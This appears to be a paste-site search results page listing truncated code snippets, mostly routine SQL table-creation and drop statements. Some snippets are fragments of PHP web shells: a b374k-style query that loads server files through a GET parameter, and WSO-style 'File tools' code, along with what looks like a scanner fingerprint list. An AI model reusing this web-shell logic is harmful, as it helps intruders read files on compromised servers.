42.7K results in 790 ms
6 years ago · Oct 15, 2019, 07:02 PM
Directory '".path()."' is not exists.")); if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable.")); print '<table width="100%" class="table_home" border="0" cellpadding="3"
6 years ago · Oct 15, 2019, 05:28 PM
g_DataBase); len += format(szQuery[len], 2048, "CREATE TABLE IF NOT EXISTS `%s`( ", g_sqlTable) len += format(szQuery[len],
6 years ago · Oct 15, 2019, 05:20 PM
Management;;"Welcome to phpMyAdmin" AND " Create new database" FSDB;;Configuration Management;;aboutprinter.shtml
6 years ago · Oct 15, 2019, 05:06 PM
Utilizador ## ---- ## Tabelas de Utilizador ## -- -- ===================================================================================== -- Create Table dbo.TDU_RF_ConfigDoc_CRF ============================================= -- Autor: António Muteca ============================================================== -- Data: 2019.05.09 ==================================================================== -- ===================================================================================== IF NOT EXISTS (SELECT 1 FROM sys.objects
6 years ago · Oct 15, 2019, 04:36 PM
SET NAMES \"UTF8\""); SQL_FastQuery(db, "CREATE TABLE IF NOT EXISTS achievements (id int(11) PRIMARY
6 years ago · Oct 15, 2019, 04:12 PM
insert data. ``'append'`` If table exists, insert data. Create if does not exist. private_key : str, optional
6 years ago · Oct 15, 2019, 03:42 PM
SET NAMES \"UTF8\""); SQL_FastQuery(db, "CREATE TABLE IF NOT EXISTS achievements (id int(11) PRIMARY
6 years ago · Oct 15, 2019, 02:38 PM
TABLE IF EXISTS `user`; CREATE TABLE IF NOT EXISTS `user` ( `iduser` bigint unsigned
6 years ago · Oct 15, 2019, 12:14 PM
isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\ CREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\ LOAD DATA INFILE
6 years ago · Oct 15, 2019, 11:44 AM
GROUP BY lower(m.mensagem)); DROP TABLE IF EXISTS mfp_mensagem; --SQL para o
6 years ago · Oct 15, 2019, 11:40 AM
GROUP BY lower(m.mensagem)); DROP TABLE IF EXISTS mfp_mensagem; --SQL para o
6 years ago · Oct 15, 2019, 09:58 AM
tabella esiste, droppala */ $sql .= "\n\nDROP TABLE IF EXISTS `".$table."`;\n"; /* Crea la struttura dela tabella */ $result1 = mysqli_fetch_row(mysqli_query($this->link,'SHOW CREATE TABLE '.$table)); $sql .= $result1[1].";\n\n"; while($row
6 years ago · Oct 15, 2019, 09:48 AM
tabella esiste, droppala */ $sql .= "\n\nDROP TABLE IF EXISTS `".$table."`;\n"; /* Crea la struttura dela tabella */ $result1 = mysqli_fetch_row(mysqli_query($this->link,'SHOW CREATE TABLE '.$table)); $sql .= $result1[1].";\n\n"; while($row
6 years ago · Oct 15, 2019, 09:36 AM
tabella esiste, droppala */ $sql .= "\n\nDROP TABLE IF EXISTS `".$table."`;\n"; /* Crea la struttura dela tabella */ $result1 = mysqli_fetch_row(mysqli_query($this->link,'SHOW CREATE TABLE '.$table)); $sql .= $result1[1].";\n\n"; while($row
6 years ago · Oct 15, 2019, 07:50 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
6 years ago · Oct 15, 2019, 07:10 AM
structure for table `deposit` -- CREATE TABLE IF NOT EXISTS `deposit` ( `deposit_id` int(11) NOT
6 years ago · Oct 15, 2019, 02:02 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
6 years ago · Oct 15, 2019, 01:42 AM
connection.cursor() as cursor: cursor.execute(''' CREATE TABLE IF NOT EXISTS {} ({}) PARTITION BY HASH ({}); '''.format(table_name,
6 years ago · Oct 15, 2019, 01:36 AM
data.</p>"); } /* Check whether the table exists and, if not, create it. */ function VerifyStudentsTable($connection, $dbName)
6 years ago · Oct 15, 2019, 01:36 AM
data.</p>"); } /* Check whether the table exists and, if not, create it. */ function VerifyStudentsTable($connection, $dbName)
Total pages: 2134